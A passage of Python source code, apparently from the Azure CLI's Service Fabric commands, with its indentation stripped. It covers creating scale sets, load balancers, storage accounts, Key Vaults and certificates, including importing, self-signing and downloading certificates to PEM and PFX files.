frontend_ip_configuration=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/frontendIPConfigurations/{}'.format(subscription_id,
resource_group_name,
lb_name,
frontendip_configuration_name)),
frontend_port_range_start=DEFAULT_FRONTEND_PORT_RANGE_START,
frontend_port_range_end=DEFAULT_FRONTEND_PORT_RANGE_END)])
poller = network_client.load_balancers.begin_create_or_update(
resource_group_name, lb_name, new_load_balancer)
LongRunningOperation(cli_ctx)(poller)
new_load_balancer = network_client.load_balancers.get(
resource_group_name, lb_name)
backend_address_pools = []
inbound_nat_pools = []
for p in new_load_balancer.backend_address_pools:
backend_address_pools.append(SubResource(id=p.id))
for p in new_load_balancer.inbound_nat_pools:
inbound_nat_pools.append(SubResource(id=p.id))
network_config_name = 'NIC-{}-{}'.format(node_type_name.lower(), node_type_name.lower())
if len(network_config_name) >= 24:
network_config_name = network_config_name[0:22]
ip_config_name = 'Nic-{}'.format(node_type_name.lower())
if len(ip_config_name) >= 24:
ip_config_name = network_config_name[0:22]
vm_network_profile = VirtualMachineScaleSetNetworkProfile(network_interface_configurations=[VirtualMachineScaleSetNetworkConfiguration(name=network_config_name,
primary=True,
ip_configurations=[VirtualMachineScaleSetIPConfiguration(name=ip_config_name,
load_balancer_backend_address_pools=backend_address_pools,
load_balancer_inbound_nat_pools=inbound_nat_pools,
subnet=ApiEntityReference(id=subnet.id))])])
compute_client = compute_client_factory(cli_ctx)
node_type_name_ref = cluster.node_types[0].name
vmss_reference = _get_cluster_vmss_by_node_type(compute_client, resource_group_name, cluster.cluster_id, node_type_name_ref)
def create_vhd(cli_ctx, resource_group_name, cluster_name, node_type, location):
storage_name = '{}{}'.format(cluster_name.lower(), node_type.lower())
name = ""
vhds = []
for n in storage_name:
if n.isalpha() or n.isdigit():
name += n
if len(name) >= 21:
break
for i in range(1, 6):
acc = create_storage_account(
cli_ctx, resource_group_name.lower(), '{}{}'.format(name, i), location)
vhds.append('{}{}'.format(acc[0].primary_endpoints.blob, 'vhd'))
return vhds
def create_storage_account(cli_ctx, resource_group_name, storage_name, location):
from azure.mgmt.storage.models import Sku, SkuName
storage_client = storage_client_factory(cli_ctx)
LongRunningOperation(cli_ctx)(storage_client.storage_accounts.create(resource_group_name,
storage_name,
StorageAccountCreateParameters(sku=Sku(name=SkuName.standard_lrs),
kind='storage',
location=location)))
acc_prop = storage_client.storage_accounts.get_properties(
resource_group_name, storage_name)
acc_keys = storage_client.storage_accounts.list_keys(
resource_group_name, storage_name)
return acc_prop, acc_keys
publisher = 'MicrosoftWindowsServer'
offer = 'WindowsServer'
version = 'latest'
sku = os_dic[DEFAULT_OS]
if cluster.vm_image.lower() == 'linux':
publisher = 'Canonical'
offer = 'UbuntuServer'
version = 'latest'
sku = os_dic['UbuntuServer1604']
storage_profile = VirtualMachineScaleSetStorageProfile(image_reference=ImageReference(publisher=publisher,
offer=offer,
sku=sku,
version=version),
os_disk=VirtualMachineScaleSetOSDisk(caching='ReadOnly',
create_option='FromImage',
name='vmssosdisk',
vhd_containers=create_vhd(cli_ctx, resource_group_name, cluster_name, node_type_name, location)))
os_profile = VirtualMachineScaleSetOSProfile(computer_name_prefix=node_type_name,
admin_password=vm_password,
admin_username=vm_user_name,
secrets=vmss_reference.virtual_machine_profile.os_profile.secrets)
diagnostics_storage_name = cluster.diagnostics_storage_account_config.storage_account_name
diagnostics_ext = None
fabric_ext = None
diagnostics_exts = [e for e in vmss_reference.virtual_machine_profile.extension_profile.extensions if e.type1.lower(
) == 'IaaSDiagnostics'.lower()]
if any(diagnostics_exts):
diagnostics_ext = diagnostics_exts[0]
diagnostics_account = diagnostics_ext.settings['StorageAccount']
storage_client = storage_client_factory(cli_ctx)
list_results = storage_client.storage_accounts.list_keys(
resource_group_name, diagnostics_account)
import json
json_data = json.loads(
'{"storageAccountName": "", "storageAccountKey": "", "storageAccountEndPoint": ""}')
json_data['storageAccountName'] = diagnostics_account
json_data['storageAccountKey'] = list_results.keys[0].value
json_data['storageAccountEndPoint'] = "https://core.windows.net/"
diagnostics_ext.protected_settings = json_data
fabric_exts = [e for e in vmss_reference.virtual_machine_profile.extension_profile.extensions if e.type1.lower(
) == SERVICE_FABRIC_WINDOWS_NODE_EXT_NAME or e.type1.lower() == SERVICE_FABRIC_LINUX_NODE_EXT_NAME]
if any(fabric_exts):
fabric_ext = fabric_exts[0]
if fabric_ext is None:
raise CLIError("No valid fabric extension found")
fabric_ext.settings['nodeTypeRef'] = node_type_name
fabric_ext.settings['durabilityLevel'] = durability_level
if 'nicPrefixOverride' not in fabric_ext.settings:
fabric_ext.settings['nicPrefixOverride'] = address_prefix
storage_client = storage_client_factory(cli_ctx)
list_results = storage_client.storage_accounts.list_keys(
resource_group_name, diagnostics_storage_name)
import json
json_data = json.loads(
'{"StorageAccountKey1": "", "StorageAccountKey2": ""}')
fabric_ext.protected_settings = json_data
fabric_ext.protected_settings['StorageAccountKey1'] = list_results.keys[0].value
fabric_ext.protected_settings['StorageAccountKey2'] = list_results.keys[1].value
extensions = [fabric_ext]
if diagnostics_ext:
extensions.append(diagnostics_ext)
vm_ext_profile = VirtualMachineScaleSetExtensionProfile(
extensions=extensions)
virtual_machine_scale_set_profile = VirtualMachineScaleSetVMProfile(extension_profile=vm_ext_profile,
os_profile=os_profile,
storage_profile=storage_profile,
network_profile=vm_network_profile)
poller = compute_client.virtual_machine_scale_sets.begin_create_or_update(resource_group_name,
node_type_name,
VirtualMachineScaleSet(location=location,
sku=ComputeSku(name=vm_sku, tier=vm_tier, capacity=capacity),
overprovision=False,
upgrade_policy=UpgradePolicy(mode=UpgradeMode.automatic),
virtual_machine_profile=virtual_machine_scale_set_profile))
LongRunningOperation(cli_ctx)(poller)
def _get_cluster_vmss_by_node_type(compute_client, resource_group_name, cluster_id, node_type_name):
vmsses = list(compute_client.virtual_machine_scale_sets.list(resource_group_name))
for vmss in vmsses:
fabric_ext = _get_sf_vm_extension(vmss)
if fabric_ext is not None:
curr_cluster_id = _get_cluster_id_in_sf_extension(fabric_ext)
if curr_cluster_id.lower() == cluster_id.lower() and fabric_ext.settings["nodeTypeRef"].lower() == node_type_name.lower():
return vmss
raise CLIError("Failed to find vmss in resource group {} for cluster id {} and node type {}".format(resource_group_name, cluster_id, node_type_name))
def _verify_cert_function_parameter(certificate_file=None,
certificate_password=None,
vault_name=None, # pylint: disable=unused-argument
vault_resource_group_name=None, # pylint: disable=unused-argument
certificate_output_folder=None,
certificate_subject_name=None,
secret_identifier=None):
if certificate_file:
if certificate_subject_name:
raise CLIError(
'\'--certificate-subject-name\' is ingored if \'--certificate-file\' is present')
if certificate_output_folder:
raise CLIError(
'\'--certificate-output-folder\' is ingored if \'--certificate-file\' is present')
else:
if secret_identifier:
if certificate_file:
raise CLIError(
'\'--certificate-file\' is ingored if \'--secret-identifier\' is present')
if certificate_password:
raise CLIError(
'\'--certificate-password\' is ingored if \'--secret-identifier\' is present')
if certificate_output_folder:
raise CLIError(
'\'--certificate-output-folder\' is ingored if \'--secret-identifier\' is present')
if certificate_subject_name:
raise CLIError(
'\'--certificate-subject-name\' is ingored if \'--secret-identifier\' is present')
else:
if certificate_subject_name:
if certificate_file:
raise CLIError(
'\'--certificate-file\' is ingored if \'--secret-identifier\' is present')
if secret_identifier:
raise CLIError(
'\'--secret-identifier\' is ingored if \'--secret-identifier\' is present')
else:
raise CLIError("Invalid input")
def _create_certificate(cmd,
cli_ctx,
resource_group_name,
certificate_file=None,
certificate_password=None,
vault_name=None,
vault_resource_group_name=None,
certificate_output_folder=None,
certificate_subject_name=None,
secret_identifier=None):
_verify_cert_function_parameter(certificate_file, certificate_password,
vault_name, vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
output_file = None
rg = _get_resource_group_by_name(cli_ctx, resource_group_name)
location = rg.location
vault_id = None
secret_url = None
certificate_thumbprint = None
VaultProperties = cmd.get_models('VaultProperties', resource_type=ResourceType.MGMT_KEYVAULT)
_create_keyvault.__doc__ = VaultProperties.__doc__
if secret_identifier is not None:
vault = _get_vault_from_secret_identifier(cli_ctx, secret_identifier)
vault_id = vault.id
certificate_thumbprint = _get_thumbprint_from_secret_identifier(
cli_ctx, vault, secret_identifier)
secret_url = secret_identifier
else:
if vault_resource_group_name is None:
logger.info("vault_resource_group_name not set, using %s.", resource_group_name)
vault_resource_group_name = resource_group_name
if vault_name is None:
logger.info("vault_name not set using '%s' as vault name.", vault_resource_group_name)
vault_name = vault_resource_group_name
vault = _safe_get_vault(cli_ctx, vault_resource_group_name, vault_name)
if certificate_file is not None:
if vault is None:
logger.info("Creating key vault")
vault = _create_keyvault(
cmd, cli_ctx, vault_resource_group_name, vault_name, location, enabled_for_deployment=True).result()
vault_uri = vault.properties.vault_uri
certificate_name = _get_certificate_name(certificate_subject_name, resource_group_name)
logger.info("Import certificate")
result = import_certificate(
cli_ctx, vault_uri, certificate_name, certificate_file, password=certificate_password)
vault_id = vault.id
secret_url = result.sid
import base64
certificate_thumbprint = b64_to_hex(
base64.b64encode(result.x509_thumbprint))
else:
if vault is None:
logger.info("Creating key vault")
if cmd.supported_api_version(resource_type=ResourceType.MGMT_KEYVAULT, min_api='2018-02-14'):
vault = _create_keyvault(
cmd, cli_ctx, vault_resource_group_name, vault_name, location, enabled_for_deployment=True).result()
else:
vault = _create_keyvault(
cmd, cli_ctx, vault_resource_group_name, vault_name, location, enabled_for_deployment=True)
logger.info("Wait for key vault ready")
time.sleep(20)
vault_uri = vault.properties.vault_uri
certificate_name = _get_certificate_name(certificate_subject_name, resource_group_name)
policy = _get_default_policy(cli_ctx, certificate_subject_name)
logger.info("Creating self-signed certificate")
_create_self_signed_key_vault_certificate.__doc__ = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'key_vault_client#KeyVaultClient').__doc__
result = _create_self_signed_key_vault_certificate(
cli_ctx, vault_uri, certificate_name, policy, certificate_output_folder=certificate_output_folder)
kv_result = result[0]
output_file = result[1]
vault_id = vault.id
secret_url = kv_result.sid
import base64
certificate_thumbprint = b64_to_hex(
base64.b64encode(kv_result.x509_thumbprint))
return vault_id, secret_url, certificate_thumbprint, output_file
# pylint: disable=inconsistent-return-statements
def _add_cert_to_vmss(cli_ctx, vmss, resource_group_name, vault_id, secret_url):
compute_client = compute_client_factory(cli_ctx)
secrets = [
s for s in vmss.virtual_machine_profile.os_profile.secrets if s.source_vault.id == vault_id]
if secrets is None or secrets == []:
if vmss.virtual_machine_profile.os_profile.secrets is None:
vmss.virtual_machine_profile.os_profile.secrets = []
new_vault_certificates = []
new_vault_certificates.append(VaultCertificate(certificate_url=secret_url, certificate_store='my'))
new_source_vault = SubResource(id=vault_id)
vmss.virtual_machine_profile.os_profile.secrets.append(VaultSecretGroup(source_vault=new_source_vault,
vault_certificates=new_vault_certificates))
else:
if secrets[0].vault_certificates is not None:
certs = [
c for c in secrets[0].vault_certificates if c.certificate_url == secret_url]
if certs is None or certs == []:
secrets[0].vault_certificates.append(
VaultCertificate(certificate_url=secret_url, certificate_store='my'))
else:
return
else:
secrets[0].vault_certificates = []
secrets[0].vault_certificates.append(
VaultCertificate(secret_url, 'my'))
poller = compute_client.virtual_machine_scale_sets.begin_create_or_update(
resource_group_name, vmss.name, vmss)
return LongRunningOperation(cli_ctx)(poller)
def _get_sf_vm_extension(vmss):
fabric_ext = None
for ext in vmss.virtual_machine_profile.extension_profile.extensions:
extension_type = None
if hasattr(ext, 'type1') and ext.type1 is not None:
extension_type = ext.type1.lower()
elif hasattr(ext, 'type_properties_type') and ext.type_properties_type is not None:
extension_type = ext.type_properties_type.lower()
if extension_type is not None and extension_type in (SERVICE_FABRIC_WINDOWS_NODE_EXT_NAME, SERVICE_FABRIC_LINUX_NODE_EXT_NAME):
fabric_ext = ext
break
if fabric_ext is None or fabric_ext == []:
return None
return fabric_ext
def _get_cluster_id_in_sf_extension(fabric_ext):
cluster_endpoint = fabric_ext.settings["clusterEndpoint"]
endpoint_list = cluster_endpoint.split('/')
cluster_id = endpoint_list[len(endpoint_list) - 1]
return cluster_id
def _add_cert_to_all_vmss(cli_ctx, resource_group_name, cluster_id, vault_id, secret_url, is_cluster_cert=False, thumbprint=None):
threads = []
import threading
compute_client = compute_client_factory(cli_ctx)
vmsses = list(compute_client.virtual_machine_scale_sets.list(resource_group_name))
if vmsses is not None:
for vmss in vmsses:
fabric_ext = _get_sf_vm_extension(vmss)
if fabric_ext is not None and (cluster_id is None or _get_cluster_id_in_sf_extension(fabric_ext).lower() == cluster_id.lower()):
if is_cluster_cert:
# add cert to sf extension
import json
secondary_setting = json.loads(
'{{"thumbprint":"{0}","x509StoreName":"{1}"}}'.format(thumbprint, 'my'))
fabric_ext.settings["certificateSecondary"] = secondary_setting
t = threading.Thread(target=_add_cert_to_vmss, args=[cli_ctx, vmss, resource_group_name, vault_id, secret_url])
t.start()
threads.append(t)
for t in threads:
t.join()
# pylint: disable=inconsistent-return-statements
def _get_target_instance(reliability_level):
level = reliability_level.lower()
if level == 'none':
return 1
if level == 'bronze':
return 3
if level == 'silver':
return 5
if level == 'gold':
return 7
if level == 'platinum':
return 9
# pylint: disable=inconsistent-return-statements
def _get_reliability_level(cluster_size):
size = int(cluster_size)
if 0 < size < 3:
return 'None'
if 3 <= size < 5:
return 'Bronze'
if 5 <= size < 7:
return 'Silver'
if 7 <= size < 9:
return 'Gold'
if size >= 9:
return 'Platinum'
def _fabric_settings_to_dict(fabric_settings):
d = {}
if fabric_settings:
for s1 in fabric_settings:
section_name = s1.name
if section_name not in d:
d[section_name] = {}
if s1.parameters:
for s2 in s1.parameters:
parameter_name = s2.name
d[section_name][parameter_name] = s2.value
return d
def _dict_to_fabric_settings(setting_dict):
settings = []
if setting_dict and any(setting_dict):
for k, v in setting_dict.items():
parameters = []
setting_des = SettingsSectionDescription(name=k, parameters=parameters)
for kk, vv in v.items():
setting_des.parameters.append(
SettingsParameterDescription(name=kk, value=vv))
if setting_des.parameters and any(setting_des.parameters):
settings.append(setting_des)
return settings
def _deploy_arm_template_core(cmd,
resource_group_name,
template,
parameters,
deployment_name=None,
mode='incremental',
validate_only=False,
no_wait=False):
DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
properties = DeploymentProperties(
template=template, template_link=None, parameters=parameters, mode=mode)
client = resource_client_factory(cmd.cli_ctx)
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate_only:
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
deploy_poll = sdk_no_wait(no_wait, client.deployments.begin_validate, resource_group_name, deployment_name,
deployment)
return LongRunningOperation(cmd.cli_ctx)(deploy_poll)
return sdk_no_wait(no_wait, client.deployments.validate, resource_group_name, deployment_name, deployment)
deploy_poll = sdk_no_wait(no_wait, client.deployments.begin_create_or_update, resource_group_name, deployment_name,
deployment)
return LongRunningOperation(cmd.cli_ctx)(deploy_poll)
def _get_vault_name(resource_group_name, vault_name):
if not vault_name:
return resource_group_name
return vault_name
def _get_certificate_name(certificate_subject_name, resource_group_name):
if certificate_subject_name is None:
certificate_name = resource_group_name
else:
certificate_name = certificate_subject_name
name = ""
for n in certificate_name:
if n.isalpha() or n == '-' or n.isdigit():
name += n
certificate_name = name
if certificate_subject_name is None:
import datetime
suffix = datetime.datetime.now().strftime("%Y%m%d%H%M")
certificate_name = "{}{}".format(certificate_name, suffix)
return certificate_name
# pylint: disable=inconsistent-return-statements
def _get_vault_from_secret_identifier(cli_ctx, secret_identifier):
key_vault_client = keyvault_client_factory(cli_ctx).vaults
vault_name = urlparse(secret_identifier).hostname.split('.')[0]
vaults = key_vault_client.list()
if vaults is not None:
vault = [v for v in vaults if v.name.lower() == vault_name.lower()]
if vault:
return vault[0]
raise CLIError("Unable to find vault with name '{}'. Please make sure the secret identifier '{}' is correct.".format(vault_name, secret_identifier))
def _get_vault_uri_and_resource_group_name(cli_ctx, vault):
client = keyvault_client_factory(cli_ctx).vaults
vault_resource_group_name = vault.id.split('/')[4]
v = client.get(vault_resource_group_name, vault.name)
vault_uri = v.properties.vault_uri
return vault_uri, vault_resource_group_name
def _safe_get_vault(cli_ctx, resource_group_name, vault_name):
key_vault_client = keyvault_client_factory(cli_ctx).vaults
try:
vault = key_vault_client.get(resource_group_name, vault_name)
return vault
except CloudError as ex:
if ex.error.error == 'ResourceNotFound':
return None
raise
def _asn1_to_iso8601(asn1_date):
import dateutil.parser
if isinstance(asn1_date, bytes):
asn1_date = asn1_date.decode('utf-8')
return dateutil.parser.parse(asn1_date)
def _get_thumbprint_from_secret_identifier(cli_ctx, vault, secret_identifier):
secret_uri = urlparse(secret_identifier)
path = secret_uri.path
segment = path.split('/')
secret_name = segment[2]
secret_version = segment[3]
vault_uri_group = _get_vault_uri_and_resource_group_name(cli_ctx, vault)
vault_uri = vault_uri_group[0]
client_not_arm = _get_keyVault_not_arm_client(cli_ctx)
secret = client_not_arm.get_secret(vault_uri, secret_name, secret_version)
cert_bytes = secret.value
x509 = None
import base64
decoded = base64.b64decode(cert_bytes)
try:
x509 = crypto.load_pkcs12(decoded).get_certificate()
except (ValueError, crypto.Error):
pass
if not x509:
x509 = crypto.load_certificate(crypto.FILETYPE_PEM, cert_bytes)
if not x509:
raise Exception('invalid certificate')
thumbprint = x509.digest("sha1").decode("utf-8").replace(':', '')
return thumbprint
def _get_certificate(client, vault_base_url, certificate_name):
""" Download a certificate from a KeyVault. """
cert = client.get_certificate(vault_base_url, certificate_name, '')
return cert
def import_certificate(cli_ctx, vault_base_url, certificate_name, certificate_data,
disabled=False, password=None, certificate_policy=None, tags=None):
CertificateAttributes = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.certificate_attributes#CertificateAttributes')
CertificatePolicy = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.certificate_policy#CertificatePolicy')
SecretProperties = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.secret_properties#SecretProperties')
import binascii
certificate_data = open(certificate_data, 'rb').read()
x509 = None
content_type = None
try:
x509 = crypto.load_certificate(crypto.FILETYPE_PEM, certificate_data)
# if we get here, we know it was a PEM file
content_type = 'application/x-pem-file'
try:
# for PEM files (including automatic endline conversion for
# Windows)
certificate_data = certificate_data.decode(
'utf-8').replace('\r\n', '\n')
except UnicodeDecodeError:
certificate_data = binascii.b2a_base64(
certificate_data).decode('utf-8')
except (ValueError, crypto.Error):
pass
if not x509:
try:
if password:
x509 = crypto.load_pkcs12(
certificate_data, password).get_certificate()
else:
x509 = crypto.load_pkcs12(certificate_data).get_certificate()
content_type = 'application/x-pkcs12'
certificate_data = binascii.b2a_base64(
certificate_data).decode('utf-8')
except crypto.Error:
raise CLIError(
'We could not parse the provided certificate as .pem or .pfx. '
'Please verify the certificate with OpenSSL.')
not_before, not_after = None, None
if x509.get_notBefore():
not_before = _asn1_to_iso8601(x509.get_notBefore())
if x509.get_notAfter():
not_after = _asn1_to_iso8601(x509.get_notAfter())
cert_attrs = CertificateAttributes(enabled=not disabled,
not_before=not_before,
expires=not_after)
if certificate_policy:
secret_props = certificate_policy.get('secret_properties')
if secret_props:
secret_props['content_type'] = content_type
elif certificate_policy and not secret_props:
certificate_policy['secret_properties'] = SecretProperties(
content_type=content_type)
else:
certificate_policy = CertificatePolicy(
secret_properties=SecretProperties(content_type=content_type))
logger.info("Starting 'keyvault certificate import'")
client_not_arm = _get_keyVault_not_arm_client(cli_ctx)
result = client_not_arm.import_certificate(cli_ctx=cli_ctx,
vault_base_url=vault_base_url,
certificate_name=certificate_name,
base64_encoded_certificate=certificate_data,
certificate_attributes=cert_attrs,
certificate_policy=certificate_policy,
tags=tags,
password=password)
logger.info("Finished 'keyvault certificate import'")
return result
def _download_secret(cli_ctx, vault_base_url, secret_name, pem_path, pfx_path, secret_version=''):
client = _get_keyVault_not_arm_client(cli_ctx)
secret = client.get_secret(vault_base_url, secret_name, secret_version)
secret_value = secret.value
if pem_path:
try:
import base64
decoded = base64.b64decode(secret_value)
p12 = crypto.load_pkcs12(decoded)
f_pem = open(pem_path, 'wb')
f_pem.write(crypto.dump_privatekey(
crypto.FILETYPE_PEM, p12.get_privatekey()))
f_pem.write(crypto.dump_certificate(
crypto.FILETYPE_PEM, p12.get_certificate()))
ca = p12.get_ca_certificates()
if ca is not None:
for cert in ca:
f_pem.write(crypto.dump_certificate(
crypto.FILETYPE_PEM, cert))
f_pem.close()
except Exception as ex: # pylint: disable=broad-except
if os.path.isfile(pem_path):
os.remove(pem_path)
raise ex
if pfx_path:
try:
import base64
decoded = base64.b64decode(secret_value)
p12 = crypto.load_pkcs12(decoded)
with open(pfx_path, 'wb') as f:
f.write(decoded)
except Exception as ex: # pylint: disable=broad-except
if os.path.isfile(pfx_path):
os.remove(pfx_path)
raise ex
def _get_default_policy(cli_ctx, subject):
if subject.lower().startswith('cn') is not True:
subject = "CN={0}".format(subject)
return _default_certificate_profile(cli_ctx, subject)
def _default_certificate_profile(cli_ctx, subject):
CertificateAttributes = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.certificate_attributes#CertificateAttributes')
CertificatePolicy = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.certificate_policy#CertificatePolicy')
ActionType = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.key_vault_client_enums#ActionType')
KeyUsageType = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.key_vault_client_enums#KeyUsageType')
IssuerParameters = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.issuer_parameters#IssuerParameters')
KeyProperties = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.key_properties#KeyProperties')
LifetimeAction = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.lifetime_action#LifetimeAction')
SecretProperties = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.secret_properties#SecretProperties')
X509CertificateProperties = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.x509_certificate_properties#X509CertificateProperties')
Trigger = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.trigger#Trigger')
Action = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.action#Action')
template = CertificatePolicy(key_properties=KeyProperties(exportable=True,
key_type=u'RSA',
key_size=2048,
reuse_key=True),
secret_properties=SecretProperties(
content_type=u'application/x-pkcs12'),
x509_certificate_properties=X509CertificateProperties(key_usage=[KeyUsageType.c_rl_sign,
KeyUsageType.data_encipherment,
KeyUsageType.digital_signature,
KeyUsageType.key_encipherment,
KeyUsageType.key_agreement,
KeyUsageType.key_cert_sign],
subject=subject,
validity_in_months=12),
lifetime_actions=[LifetimeAction(trigger=Trigger(days_before_expiry=90),
action=Action(action_type=ActionType.auto_renew))],
issuer_parameters=IssuerParameters(
name=u'Self',),
attributes=CertificateAttributes(enabled=True))
return template
def _create_self_signed_key_vault_certificate(cli_ctx, vault_base_url, certificate_name, certificate_policy, certificate_output_folder=None, disabled=False, tags=None, validity=None):
CertificateAttributes = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.certificate_attributes#CertificateAttributes')
cert_attrs = CertificateAttributes(enabled=not disabled)
logger.info("Starting long-running operation 'keyvault certificate create'")
if validity is not None:
certificate_policy['x509_certificate_properties']['validity_in_months'] = validity
client = _get_keyVault_not_arm_client(cli_ctx)
client.create_certificate(
vault_base_url, certificate_name, certificate_policy, cert_attrs, tags)
# otherwise loop until the certificate creation is complete
while True:
check = client.get_certificate_operation(
vault_base_url, certificate_name)
if check.status != 'inProgress':
logger.info("Long-running operation 'keyvault certificate create' finished with result %s.",
check)
break
try:
time.sleep(10)
except KeyboardInterrupt:
logger.info("Long-running operation wait cancelled.")
raise
except Exception as client_exception:
message = getattr(client_exception, 'message', client_exception)
import json
try:
message = str(message) + ' ' + json.loads(
client_exception.response.text)['error']['details'][0]['message'] # pylint: disable=no-member
except: # pylint: disable=bare-except
pass
raise CLIError('{}'.format(message))
pem_output_folder = None
if certificate_output_folder is not None:
os.makedirs(certificate_output_folder, exist_ok=True)
pem_output_folder = os.path.join(
certificate_output_folder, certificate_name + '.pem')
pfx_output_folder = os.path.join(
certificate_output_folder, certificate_name + '.pfx')
_download_secret(cli_ctx, vault_base_url, certificate_name,
pem_output_folder, pfx_output_folder)
return client.get_certificate(vault_base_url, certificate_name, ''), pem_output_folder
def _get_keyVault_not_arm_client(cli_ctx):
from azure.cli.core._profile import Profile
version = str(get_api_version(cli_ctx, ResourceType.DATA_KEYVAULT))
def get_token(server, resource, scope): # pylint: disable=unused-argument
return Profile(cli_ctx=cli_ctx).get_raw_token(resource)[0]
client = KeyVaultClient(KeyVaultAuthentication(get_token), api_version=version)
return client
def _create_keyvault(cmd,
cli_ctx,
resource_group_name,
vault_name,
location=None,
sku=None,
enabled_for_deployment=True,
enabled_for_disk_encryption=None,
enabled_for_template_deployment=None,
no_self_perms=None, tags=None):
from azure.cli.core._profile import Profile
from azure.graphrbac.models import GraphErrorException
profile = Profile(cli_ctx=cli_ctx)
cred, _, tenant_id = profile.get_login_credentials(
resource=cli_ctx.cloud.endpoints.active_directory_graph_resource_id)
graph_client = GraphRbacManagementClient(cred,
tenant_id,
base_url=cli_ctx.cloud.endpoints.active_directory_graph_resource_id)
subscription = profile.get_subscription()
VaultCreateOrUpdateParameters = cmd.get_models('VaultCreateOrUpdateParameters', resource_type=ResourceType.MGMT_KEYVAULT)
VaultProperties = cmd.get_models('VaultProperties', resource_type=ResourceType.MGMT_KEYVAULT)
KeyVaultSku = cmd.get_models('Sku', resource_type=ResourceType.MGMT_KEYVAULT)
AccessPolicyEntry = cmd.get_models('AccessPolicyEntry', resource_type=ResourceType.MGMT_KEYVAULT)
Permissions = cmd.get_models('Permissions', resource_type=ResourceType.MGMT_KEYVAULT)
CertificatePermissions = get_sdk(cli_ctx, ResourceType.MGMT_KEYVAULT, 'models#CertificatePermissions')
KeyPermissions = get_sdk(cli_ctx, ResourceType.MGMT_KEYVAULT, 'models#KeyPermissions')
SecretPermissions = get_sdk(cli_ctx, ResourceType.MGMT_KEYVAULT, 'models#SecretPermissions')
KeyVaultSkuName = cmd.get_models('SkuName', resource_type=ResourceType.MGMT_KEYVAULT)
if not sku:
sku = KeyVaultSkuName.standard.value
if no_self_perms:
access_policies = []
else:
permissions = Permissions(keys=[KeyPermissions.get,
KeyPermissions.create,
KeyPermissions.delete,
KeyPermissions.list,
KeyPermissions.update,
KeyPermissions.import_enum,
KeyPermissions.backup,
KeyPermissions.restore],
secrets=[SecretPermissions.get,
SecretPermissions.list,
SecretPermissions.set,
SecretPermissions.delete,
SecretPermissions.backup,
SecretPermissions.restore,
SecretPermissions.recover],
certificates=[CertificatePermissions.get,
CertificatePermissions.list,
CertificatePermissions.delete,
CertificatePermissions.create,
CertificatePermissions.import_enum,
CertificatePermissions.update,
CertificatePermissions.managecontacts,
CertificatePermissions.getissuers,
CertificatePermissions.listissuers,
CertificatePermissions.setissuers,
CertificatePermissions.deleteissuers,
CertificatePermissions.manageissuers,
CertificatePermissions.recover])
try:
object_id = _get_current_user_object_id(graph_client)
except GraphErrorException:
object_id = _get_object_id(graph_client, subscription=subscription)
if not object_id:
raise CLIError('Cannot create vault.\n'
'Unable to query active directory for information '
'about the current user.\n'
'You may try the --no-self-perms flag to create a vault'
' without permissions.')
access_policies = [AccessPolicyEntry(tenant_id=tenant_id,
object_id=object_id,
permissions=permissions)]
properties = VaultProperties(tenant_id=tenant_id,
sku=KeyVaultSku(name=sku),
access_policies=access_policies,
vault_uri=None,
enabled_for_deployment=enabled_for_deployment,
enabled_for_disk_encryption=enabled_for_disk_encryption,
enabled_for_template_deployment=enabled_for_template_deployment)
parameters = VaultCreateOrUpdateParameters(location=location,
tags=tags,
properties=properties)
client = keyvault_client_factory(cli_ctx).vaults
return client.create_or_update(resource_group_name=resource_group_name,
vault_name=vault_name,
parameters=parameters)
# pylint: disable=inconsistent-return-statements
def _get_current_user_object_id(graph_client):
try:
current_user = graph_client.signed_in_user.get()
if current_user and current_user.object_id: # pylint:disable=no-member
return current_user.object_id # pylint:disable=no-member
except CloudError:
pass
def _get_object_id_by_spn(graph_client, spn):
accounts = list(graph_client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(spn)))
if not accounts:
logger.warning("Unable to find user with spn '%s'", spn)
return None
if len(accounts) > 1:
logger.warning("Multiple service principals found with spn '%s'. "
"You can avoid this by specifying object id.", spn)
return None
return accounts[0].object_id
def _get_object_id_by_upn(graph_client, upn):
accounts = list(graph_client.users.list(
filter="userPrincipalName eq '{}'".format(upn)))
if not accounts:
logger.warning("Unable to find user with upn '%s'", upn)
return None
if len(accounts) > 1:
logger.warning("Multiple users principals found with upn '%s'. "
"You can avoid this by specifying object id.", upn)
return None
return accounts[0].object_id
def _get_object_id_from_subscription(graph_client, subscription):
if subscription['user']:
if subscription['user']['type'] == 'user':
return _get_object_id_by_upn(graph_client, subscription['user']['name'])
if subscription['user']['type'] == 'servicePrincipal':
return _get_object_id_by_spn(graph_client, subscription['user']['name'])
logger.warning("Unknown user type '%s'",
subscription['user']['type'])
else:
logger.warning('Current credentials are not from a user or service principal. '
'Azure Key Vault does not work with certificate credentials.')
def _get_object_id(graph_client, subscription=None, spn=None, upn=None):
if spn:
return _get_object_id_by_spn(graph_client, spn)
if upn:
return _get_object_id_by_upn(graph_client, upn)
return _get_object_id_from_subscription(graph_client, subscription)
def _get_template_file_and_parameters_file(linux=None):
script_dir = os.path.dirname(os.path.realpath(__file__))
